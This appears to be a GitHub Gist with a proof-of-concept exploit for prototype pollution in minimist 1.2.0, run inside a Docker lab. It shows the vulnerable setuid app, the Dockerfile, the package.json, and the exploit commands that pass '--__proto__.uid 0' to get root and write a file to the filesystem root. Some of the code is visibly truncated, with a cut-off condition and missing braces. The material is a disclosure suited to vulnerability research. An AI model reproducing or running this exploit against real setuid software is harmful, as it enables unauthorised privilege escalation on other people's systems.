Skip to content

Instantly share code, notes, and snippets.



Last active Nov 29, 2020
What would you like to do?
Prototype Pollution security vulnerability in minimist

Prototype Pollution security vulnerability in minimist

How to run:

  1. npm i
  2. npm run build
  3. npm run start


Now you are in a sandbox with permissions of just-user. Our goal is to create test.txt at the root of a container. For sure we don't have that permissions.

To validate it let's try to do the following:

echo "test" > /test.txt
bash: /test.txt: Permission denied


  1. Create exploit script: printf '#!/bin/sh\necho "test" > /test.txt' > /tmp/exploit
  2. Give it execute permission: chmod +x /tmp/exploit
  3. Run the application: ./app --__proto__.uid 0 /tmp/exploit

To validate run cat /test.txt.

As you can see we have permission violation via vulnerable application.

const argv = require('minimist')(process.argv.slice(2));
const cp = require('child_process');
if ( {
console.log("This app has no options - just show list of files in root");
} else {
console.log(String(cp.execSync('ls /')));
FROM ubuntu:18.04
COPY ./app /app
RUN chmod u+s /app
RUN useradd -s /bin/bash just-user
USER just-user
"name": "poc",
"version": "1.0.0",
"description": "",
"main": "index.js",
"keywords": [],
"author": "",
"license": "ISC",
"scripts": {
"start": "docker run --rm -it poc bash",
"build": "npm run build:cli && npm run build:docker",
"build:cli": "pkg app.js --target node10-linux-x64",
"build:docker": "docker build . --tag poc"
"dependencies": {
"minimist": "1.2.0"
"devDependencies": {
"pkg": "4.4.4"
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment